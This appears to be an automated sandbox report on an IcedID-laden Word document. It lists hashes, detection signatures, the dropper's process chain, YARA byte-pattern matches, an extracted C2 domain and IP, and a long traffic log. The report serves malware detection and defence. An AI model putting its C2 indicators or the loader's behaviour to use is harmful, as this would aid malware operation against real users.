Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dodsonimaging,file,08.11.2022.doc

Overview

General Information

Sample Name:dodsonimaging,file,08.11.2022.doc
Analysis ID:682555
MD5:db11828aed458eccfab30c367bc1bb2f
SHA1:3487931f130485c82d21e9ef4155af0a8fd46c33
SHA256:d297f78ca4fc35e899792260c98f752947f7d6b5999650a6210f4a8538a2e655
Tags:docIcedID
Infos:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Yara detected IcedID
Submitted sample is a known malware sample
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1232 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • r8F8A.tmp.exe (PID: 1364 cmdline: "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • rundll32.exe (PID: 1552 cmdline: "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
{"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_0b62e783unknownunknown
  • 0x876:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_91562d18unknownunknown
  • 0x1bc4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_48029e37unknownunknown
  • 0x1190:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_11d24d35unknownunknown
  • 0x3d0:$a2: loader_dll_64.dll
00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_6Yara detected IcedIDJoe Security
    Click to see the 7 entries
    SourceRuleDescriptionAuthorStrings
    5.2.rundll32.exe.180000000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27d0:$internal_name: loader_dll_64.dll
    • 0x3198:$string0: _gat=
    • 0x3048:$string1: _ga=
    • 0x30a0:$string2: _gid=
    • 0x3118:$string3: _u=
    • 0x303a:$string4: _io=
    • 0x3054:$string5: GetAdaptersInfo
    • 0x2b08:$string6: WINHTTP.dll
    • 0x27f4:$string7: DllRegisterServer
    • 0x2806:$string8: PluginInit
    • 0x3134:$string9: POST
    5.2.rundll32.exe.180000000.1.unpackJoeSecurity_IcedID_6Yara detected IcedIDJoe Security
      5.2.rundll32.exe.180000000.1.unpackMALWARE_Win_IceIDDetects IceID / Bokbot variantsditekSHen
      • 0x3134:$n1: POST
      • 0x3194:$n2: ; _gat=
      • 0x3044:$n3: ; _ga=
      • 0x3114:$n4: ; _u=
      • 0x3034:$n5: ; __io=
      • 0x309c:$n6: ; _gid=
      • 0x316c:$n7: Cookie: __gads=
      • 0x30f4:$s1: c:\ProgramData
      • 0x27d0:$s2: loader_dll_64.dll
      5.2.rundll32.exe.180000000.1.unpackWindows_Trojan_IcedID_11d24d35unknownunknown
      • 0x27d0:$a2: loader_dll_64.dll
      5.2.rundll32.exe.180000000.1.unpackWindows_Trojan_IcedID_0b62e783unknownunknown
      • 0xc76:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
      Click to see the 14 entries
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: dodsonimaging,file,08.11.2022.docVirustotal: Detection: 26%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dllAvira: detection malicious, Label: HEUR/AGEN.1251556
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dllAvira: detection malicious, Label: HEUR/AGEN.1251556
      Source: Yara matchFile source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
      Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
      Source: dodsonimaging,file,08.11.2022.docJoe Sandbox ML: detected
      Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D2CCA CryptCreateHash,
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D2CDA CryptCreateHash,
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D2CF7 CryptCreateHash,CryptAcquireContextW,
      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF74D2CCA CryptCreateHash,
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: rundll32.pdb source: r8F8A.tmp.exe, r8F8A.tmp.exe, 00000004.00000000.924645726.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe, 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe.0.dr

      Software Vulnerabilities

      barindex
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.drJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exeJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
      Source: global trafficDNS query: name: alexbionka.com
      Source: global trafficDNS query: name: alexbionka.com
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
